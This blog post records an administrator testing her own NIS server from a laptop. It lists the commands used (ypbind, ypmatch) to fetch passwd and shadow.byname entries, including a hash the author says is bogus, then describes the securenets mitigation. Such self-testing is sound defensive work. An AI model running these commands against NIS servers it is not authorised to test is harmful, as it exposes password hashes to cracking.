Diane Trout (alienghic) wrote,
Diane Trout
alienghic

NIS insecurity

I'd heard that NIS was insecure, so I decided to see what I could do. (for those that don't know NIS is a common method of distributing login information to Unix clusters). And after this experiment, I'm trying to figure out how to use LDAP protected by TLS for my servers.



I tested hacking NIS from my laptop
$ sudo apt-get install nis
$ sudo vi yp.conf
add "ypdomain 192.168.20.1" (AKA the NIS server's IP Address)
$ sudo vi defaultdomain
add "nisdomain"
(I knew I had limited access to the NIS server to just the subnet, so I made sure to be on the same network)
$ sudo ypbind -d
parsing config file
Trying entry: ypserver 192.168.20.1
parsed ypserver 192.168.20.1
add_server() domain: nisdomain, host: 192.18.20.1, nobroadcast, slot: 0
[Welcome to ypbind-mt, version 1.8]

ping host '192.168.20.1', domain 'nisdomain'
Answer for domain 'nisdomain' from server '192.168.20.1'
Pinging all active server.


$ ypmatch diane shadow
Can't match key diane in map shadow. Reason: No such map in server's domain
$ ypmatch diane passwd.byname
diane:x:1000:1000:Diane Trout:/home/diane:/bin/bash
$ sudo ypmatch diane shadow.byname
diane:uxKjlaDjal:12099:0:99999:7:::134540308

Needless to say, the crypted password is a bogus string and the domain name and IP addresses have been changed to protect the innocent.

Though one coworker did suggest a solution, explicitly put the IP addresses of all the machines that should have access in the ypserv.securenets file.

That did work, though if an "evildoer" can steal one of my IP addresses they can still get the crypted passwords.
Subscribe

  • Guild Wars 2

    I started playing Guild Wars 2, and am happy their questing system has broken with WoW's current quest design. As WoW grew they "simplified" and…

  • calendar.

    Its been a really long time since I tried to write. I keep meaning to roll my own blog software, but there's so many other things I should be doing.…

  • Building debian packages for mozilla's sync server

    I'm surprised this seems to have gotten valid debian packages with a minimum of fuss for a package where I couldn't find a recommended release…

  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

  • 0 comments